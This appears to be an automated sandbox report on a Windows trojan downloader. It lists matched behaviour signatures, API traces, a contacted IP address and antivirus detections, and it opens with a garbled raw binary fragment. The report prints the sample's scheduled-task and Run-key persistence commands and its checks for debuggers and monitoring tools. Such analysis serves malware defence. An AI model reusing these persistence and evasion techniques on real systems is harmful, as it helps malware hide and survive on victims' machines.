buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†…²ßûð. ª,J @ @-@…-T6 H.textĨ, ª, `.sdataHà,®,@À.rsrcT6-8¾,@@.reloc @-ö,@B È,HȪ&oÈÐœ÷ 0÷ +& f8tþ &þ! L(:X8S8ªþ ? Xþ?þ ?þ þþA8[ & <(:8þ ;#éÁ/Ÿûÿ'@#@( Y( þþ<þ <:ƒ C8Ýþ G þþ e8Ã8hþ 5 Xþ5þ 5þ þþ7 8˜þ %þ %KàXþ%þ %n#%@# @Y( jX 4~̘ ȁ3gaij_àþ%þ %#ð?#ð?(X( Xþ%þ %Gþ&þ %#ð?#ð?( X( Xþ% s(:ï&þ þ KàX#@#ð?(Y( Xþ [8¶þ #ëÁݝ{ƒ!@#@(X( þþ `(9&þ #@#@(Y( X#aÿs )ÛA#› ËA(Y( T V(:-8(þ þ #@#@(X( XKàXþ d8ð8c þ #´ ¨ÿ!@#@(Y( #½ógæ jQ@#@@( Y( þ (&þ #>Gß_ÈÅ@#@(Y( Xþ H:n&þ #€V@#>@Y( Xþþ þ KàX%þþ 28-þ % Tþ %#@#@( X( Xþ% 8òþ # ÷ 5A4@#@(Y( X Tþ #ð?#ð?(X( Ó Õï¶g Ñï¶gaiZX T((9Uüÿÿ& =(:r&þ 9(þ #@#ð?[( Xþ 8¬þ Rþ Xþ n9& þ/8¡ fþLþ LE¯ö"î¯\*Q~  āûÿÿSÝï ,¡ gúÿÿd”ˆff´¯ À ¬ùÿÿÝ‹ùÿÿze -á.=ðIûÿÿ îôy&¿<úÿÿ“pˆ ³ w,œ 9 ýÿÿ„*æ-Ý ³8×ûÿÿkêØ Ôãýÿÿá þŽýÿÿ¿Ö Ë®’üÿÿÒüÿÿœgïR–@c s ¥³Þªb£Íùÿÿ ûÿÿďx w­[3"úÿÿ¡TK  ?‡üÿÿ#WÁçùÿÿ:“P r /(9ðýÿÿ&þ 9ì ^8Üýÿÿþ þ 'þ #LH…#æ,@#@(Y( XKž |8¤ýÿÿþ þ àXþ#þ ##B@#B@(X( #@@#@@(X( þ (& :Aýÿÿ&þ % Xþ%þ %G þþIþ I9 8ýÿÿþ #@#ø?(Y( Xþ -8Ýüÿÿþ #€z7×iŽ)@#@( Y( Xþ 8¬üÿÿþ þ þ ?•þ !þ ?•Xþ8 þ@þ @9.øÿÿþ þ þ ?•Yþ "þ ?•Xþ 8Uüÿÿþ G þþ J8;üÿÿþ +þ þ 2•Yþ "þ 2•Xþ+8Éþ 2 Xþ2 8üÿÿ8~þ % Rþ % Xþ%þ F XþFþ F#@#@Z( þþJ i8¨ûÿÿ8%þ % R K8ûÿÿþ Xþ _8wûÿÿþ þ $àXþ%þ %#@#@(Y( #½ógæ jQ@#@@(Y( þ (& P8ûÿÿþ þ .àX#¼‚?<)•$@#@( X( #@@#@@(X( þ (&þ #€ÝÐËA#€ÝÐËAX( T \8úÿÿþ :’þ  Xþ j8{úÿÿþ ; Xþ; y8cúÿÿ þ8 Z8Púÿÿþ #îôë½ï_@#N@(Y( YKþ ,8úÿÿ þ= 48 úÿÿþ n#.ð¥{E„@# @(X( jX# @#À[( j_àþ þ #@#ð?( X( Xþ þ Gþ a8Œùÿÿ8Õ þ þ 8•þ .B¥ (8kùÿÿþ þ KàXþ *(:Mùÿÿ&þ #î’KE¹@#@( X( Xþ X%þþ x8ùÿÿþ Xþ 8iþÿÿþ Rþ Xþ þ  
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00505c00', u'virtual_address': u'0x00318000', u'entropy': 7.993503009520998, u'name': u'.zip#**.', u'virtual_size': u'0x00505a30'} entropy 7.99350300952 description A section with a high entropy has been found
section {u'size_of_data': u'0x00021000', u'virtual_address': u'0x00820000', u'entropy': 6.882016393250344, u'name': u'.rsrc', u'virtual_size': u'0x0005884f'} entropy 6.88201639325 description A section with a high entropy has been found
entropy 0.998391217943 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url http://purl.org/rss/1.0/
url http://www.passport.com
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Hijack network configuration rule Hijack_Network
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Install itself for autorun at Windows startup rule Persistence
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
cmdline "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe"
cmdline C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe
cmdline "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
cmdline schtasks.exe /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f
host 185.172.128.100
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: Registry Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: File Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Process Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: Registry Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: File Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Process Monitor - Sysinternals: www.sysinternals.com
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
Time & API Arguments Status Return Repeated

EnumServicesStatusW

service_handle: 0x000000004b8ded30
service_type: 48
service_status: 3
0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\clips.exe reg_value C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mnr.exe reg_value C:\Users\test22\AppData\Local\Temp\1000004001\mnr.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
cmdline schtasks.exe /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f
Process injection Process 2968 resumed a thread in remote process 2076
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2076
1 0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 76 (SystemFirmwareTableInformation)
3221225507 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed e9 1f 09 07 00 1a 37 88 23 ff ff 1e ce cd 35
exception.symbol: clips+0x32daf0
exception.instruction: in eax, dx
exception.module: clips.exe
exception.exception_code: 0xc0000096
exception.offset: 3332848
exception.address: 0x158daf0
registers.esp: 3145072
registers.edi: 4861434
registers.eax: 1447909480
registers.ebp: 19542016
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 19916755
registers.ecx: 10
1 0 0
Time & API Arguments Status Return Repeated

LdrGetProcedureAddress

ordinal: 0
function_address: 0x000000000014eab8
function_name: wine_get_unix_file_name
module: KERNEL32
module_address: 0x0000000076c10000
-1073741511 0
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Deyma.a!c
Skyhigh Artemis!Trojan
McAfee Artemis!3E478DCC2A01
Sangfor Downloader.Win32.Deyma.Vruk
K7AntiVirus Trojan ( 0059d08c1 )
K7GW Trojan ( 0059d08c1 )
CrowdStrike win/malicious_confidence_90% (W)
BitDefenderTheta Gen:NN.ZexaF.36792.@J1@ay9cEekO
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/GenCBL.DFH
APEX Malicious
Kaspersky Trojan-Downloader.Win32.Deyma.gmg
Rising Downloader.Deyma!8.1093B (CLOUD)
Sophos Mal/Generic-S
Trapmine malicious.high.ml.score
FireEye Generic.mg.3e478dcc2a01b611
Ikarus Win32.Outbreak
Webroot W32.Trojan.Znyonm
Microsoft Trojan:Win32/Znyonm
ZoneAlarm Trojan-Downloader.Win32.Deyma.gmg
Cynet Malicious (score: 100)
DeepInstinct MALICIOUS
Panda Trj/Chgt.AD
TrendMicro-HouseCall TROJ_GEN.R002H0DK423
AVG Win32:Evo-gen [Trj]
Avast Win32:Evo-gen [Trj]